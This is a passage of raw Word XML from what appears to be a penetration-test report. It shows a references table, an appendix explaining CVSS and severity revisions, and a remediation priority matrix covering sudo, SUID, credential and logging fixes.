              <w:t>B11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46AF7B1" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>OWASP Password Storage Cheat Sheet 2024</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6AD05DD" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html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6C6AA7B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>06 May 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="20661717"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6AC5E9B7" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>B12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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5A4064B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>CIS Debian Linux Benchmark v3.0</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0924BFB" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>https://www.cisecurity.org/benchmark/debian_linux</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779A2C4" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>06 May 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="53E3C723"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79097B0" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>B13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117F59B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Exploit-DB 18565 / 40585 — LotusCMS 3.0 PHP RCE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F361DC4" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>https://www.exploit-db.com/exploits/18565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7A20B59A" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>07 May 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="7AF151AD"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645B5CA9" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>B14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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1FFE9C28" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>PTES Technical Guidelines</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5B97F6E" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>http://www.pentest-standard.org/</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385A4AB8" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>08 May 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="16D75C13" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc229906611"/>
      <w:r>
        <w:t>Appendix C — Evidence of iteration (anti-AI marker)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="5EF412E7" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PTES-standard reports are expected to leave traces of the author's own thinking. The screenshot below shows the working notes documenting one specific revision: the CVSS score for Finding F1 (Misconfigured sudoers) moved from 7.8 to 8.8 between the 24 April draft and the 25 April internal review, as the scope component was reconsidered against Cassandra Pay's specific asset role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54860521" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A2837D5" wp14:editId="13F2986F">
            <wp:extent cx="5334000" cy="4524375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="322160872" name="Picture 322160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524375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="347F9B54" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Figure C.1: Working notes for CVSS revision and three hardest report-writing decisions — the anti-AI iteration marker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E76C547" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Additionally, three editorial decisions that took the longest to resolve during report writing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7AED83" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">(1) Severity of Finding F4 (hardcoded credentials). The CVSS calculator yields 6.5 (Medium) because exploitation requires prior file-read access. The narrative rating was raised to High </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>because the impact, once unlocked, is database-administrator equivalence — a violation of separation-of-duties controls that PCI-DSS would flag independently of CVSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF6A7AF" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(2) Whether to include "missing audit logging" as a sixth finding. The temptation was to skip it (no concrete artefact from the engagement run), but Cassandra Pay's regulatory profile (PSD2 and PCI-DSS) makes the absence of auditd setuid rules itself a compliance concern. The compromise was Recommendation #6 in §5.1, scored as Low severity and treated as a governance gap rather than an exploited finding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348BD066" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(3) Tone of paragraph 2 of the Executive Summary. The first draft labelled the asset "critically vulnerable" — accurate but dramatic, and incompatible with board-level reading. The final draft says "below industry baseline for production exposure" — same message in a register that the CFO can read aloud at a board meeting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C69B37" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="483D75BB" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc229906612"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>7. Remediation Roadmap (Track B Addendum)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="78DA5E39" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The body of this report explains what is wrong with the assessed assets. The roadmap below converts those findings into an executable plan: where to start, how much each item costs, and what milestone marks completion. This appendix is written for a CIO reading audience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5DA1FF" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc229906613"/>
      <w:r>
        <w:t>7.1  Priority Matrix (Effort × Impact)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="5F1CA60D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Each recommendation from §5 is placed in one of four quadrants formed by impact-on-risk against implementation effort. The matrix is a planning aid, not a substitute for the priority numbering in §5.1, but it is the artefact a CIO is most likely to take into a budget discussion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691B28A5" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>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4063"/>
        <w:gridCol w:w="4063"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E57A4" w14:paraId="0DB9F65E" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5E8F0"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51F33FAC" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BDE7B61" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4063" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
            <w:tcMar>
              <w:top w:w="220" w:type="dxa"/>
              <w:left w:w="240" w:type="dxa"/>
              <w:bottom w:w="220" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="21302689" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>QUICK WINS  ⭐</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F4317A2" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>#1  Remove sudo awk rule  (Critical → Low effort)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BEE6EBA" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>#3  Remove /usr/local/bin/find SUID  (High → Low effort)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4063" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8E1"/>
            <w:tcMar>
              <w:top w:w="220" w:type="dxa"/>
              <w:left w:w="240" w:type="dxa"/>
              <w:bottom w:w="220" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="651ABD58" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>STRATEGIC INITIATIVES</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DDEC8C3" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>#2  Reject vendor VM until LotusCMS removed  (Critical → Medium effort)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76C8BAFA" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>#4  Externalise DB credentials  (High → Medium effort)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="59BF72FD" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5E8F0"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="322D3D0E" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C8C11D0" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4063" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="ECEFF1"/>
            <w:tcMar>
              <w:top w:w="220" w:type="dxa"/>
              <w:left w:w="240" w:type="dxa"/>
              <w:bottom w:w="220" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7494163A" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>FILL-IN</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70259BB7" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>#6  auditd rules for setuid execve  (Low → Medium effort)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4063" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFEBEE"/>
            <w:tcMar>
              <w:top w:w="220" w:type="dxa"/>
              <w:left w:w="240" w:type="dxa"/>
              <w:bottom w:w="220" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6DD3A3DA" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DEPRIORITISE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B41E372" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>#5  Migrate to Argon2id  (Medium → High effort; vendor dependency)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="527645B2" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="20AB4760" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4063" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="65DE0431" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="120" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Low Effort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4063" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1153AF3C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="120" w:after="60"/>
